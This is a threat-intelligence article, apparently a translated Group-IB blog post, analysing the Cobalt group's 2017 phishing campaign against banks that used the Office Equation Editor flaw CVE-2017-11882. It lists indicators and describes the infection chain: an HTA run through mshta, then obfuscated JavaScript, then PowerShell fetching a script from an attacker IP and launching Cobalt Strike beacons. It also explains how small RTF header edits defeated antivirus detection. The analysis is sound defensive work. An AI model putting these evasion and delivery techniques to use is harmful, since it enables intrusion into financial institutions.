When hackers are faster than antiviruses

    FinCERT, the Central Bank's security division for information security, in its latest report called the Cobalt group the main threat to banks, and its attacks - the main trend. Cobalt, indeed, is now one of the most active and aggressive criminal groups. For a year, experts calculated, she made at least 50 successful attacks around the world, constantly testing new tools, changing attack vectors and targets. In addition to contactless attacks on ATMs, Cobalt is trying to gain access to interbank transfer systems (SWIFT), payment gateways and card processing. In this article, we will show why traditional remedies cannot save such groups from hacker attacks. And what to do to protect your business from financial and reputational losses.

    Text: Andrey Zosimov, viral analyst.

    On November 14, 2017, specialists from Embedi published a technical report on the vulnerability CVE-2017-11882, and also demonstrated it in various versions of Microsoft Office products. This vulnerability allows arbitrary code to be executed, as well as download executable files and run them for execution. It has existed since 2000 - just then a vulnerable Microsoft Equation element was created, or rather, “EQNEDT32.EXE”. This element allows you to embed mathematical formulas in Office documents using OLE technology. With the release of Office 2007, this component was updated, but support for the old version remained for compatibility with old documents. So the vulnerability has existed for 17 years.

    CVE itself was registered on July 31, 2017, and a few days later, specialists from Embedi reported it to Microsoft. The final patch from Microsoft was released only on November 14, 2017.

    Three days ago, on November 21, the Proof of Concept of this vulnerability (https://github.com/embedi/CVE-2017-11882), as well as a python script that allows you to create your own vulnerable one, was published in the public GitHub repository Embedi. " rtf "document.

    First activity


    A few hours later, the Cobalt hacker group began a massive mailing of phishing emails to financial institutions containing an vulnerable document that could not be detected by anti-virus solutions:

    image

    A malicious document was distributed in the mailing with the name “Changes to the rules for making transfers.

    image

    The domain cards-cbr.ru, from which this letter was sent, was registered on the day of distribution - 2017-11-21. It has an IP address of "104.254.99.77".

    The following letter with empty content was also distributed.

    Technical headings:

    image

    As we can see, the antivirus solution missed the malicious email. As a result, the malicious attachment got to a bank employee.
    Our TDS Polygon system successfully detected an attack by issuing a verdict of 92%, and a CERT Group-IB employee informed the client about the situation:

    image

    A detected malicious document (MD5 F360D41A0B42B129F7F0C29F98381416) was uploaded to Virustotal 2017-11-21 13:27:59 (UTC) and at that time it was detected only by Rising antivirus as “Exploit.CVE-2017-11882.Gen! 1.AED3 (CLASSIC)”. It contained the following command that it executed:

    image

    Judging by the structure of the file, it was clearly built using the published Python script. After a few hours, other anti-virus solutions began to identify the file as malicious, but the attackers responded immediately. They immediately altered the exploit so that it again stopped being detected by many popular antiviruses (MD5 8993F927BEAF8DAA02BB792C86C2B5E0):

    image

    image

    The domain name swift-alliance.com was created and registered by others on 2016-08-24, but it expired on 2017-08-24, Cobalt criminals tracked this fact and registered this domain name on 11/21/2017. Now the domain name “swift-alliance.com” has an IP address association with the domain “cards-cbr.ru”, which participated in the previous newsletter. At the moment (11/22/2017) all these domains have an IP address of 139.59.89.20, and earlier than 11/21/2017 they had an IP address of 104.254.99.67:

    image

    Both had the same grouping - the load was loaded from the IP address “138.68. 234.128 ”, which distributes Cobalt-Strike. In the second case, the HTA executable file was loaded, which was executed through the mshta.exe program:

    image

    The downloaded file contains obfuscated JS, which as a result executes the encoded Powershell script:

    image

    As a result of this code, the PS script is downloaded from the remote hosting “http://104.254.99.77/out.ps1”, which is then executed. Downloaded Powershell contains two coded Beacon'a, which are launched in accordance with the bit depth of the OS.

    Changes


    The amended document is not so different from the original, but there are still differences. Firstly, the headers of the RTF document were changed:

    image

    As you can see, the keyword “objclass” was cut from the object’s title, which is optional:

    image

    The object name was changed from “Equation.3” to “1NYMiqIGRD”. Also, in the original version, the shellcode at the end was filled with the letters “A”, while in the converted exploit the remaining space is filled with spaces: The

    image

    signatures (marked in red) before and after the shellcode are not changed. In essence, the main changes have been made to the headers of the RTF document and the embedded object, including at the end:

    image

    Here, the attackers simply changed the image parameters and added some of their own, which essentially do not affect anything:

    “Picwgoal” and “pichgoal” - are responsible for the width and height of the picture in twips

    “picw” and “pich” - are responsible for the width and height of the picture in pixels

    “picscale” - image scaling.

    And here is the conclusion: it was enough to change the document slightly and anti-virus solutions are powerless before such an attack.

    What could be the way out of this situation? Threat Intelligence makes it possible to keep abreast of attacks carried out by hacker groups, as well as have at its disposal traffic analysis systems and sandboxes that will verdict malicious files not based on signatures, but using behavioral analysis and an accumulated knowledge base on the characteristic behavior of one or another hacker group.

    Read the full version on the Group-IB Blog

    Also popular now: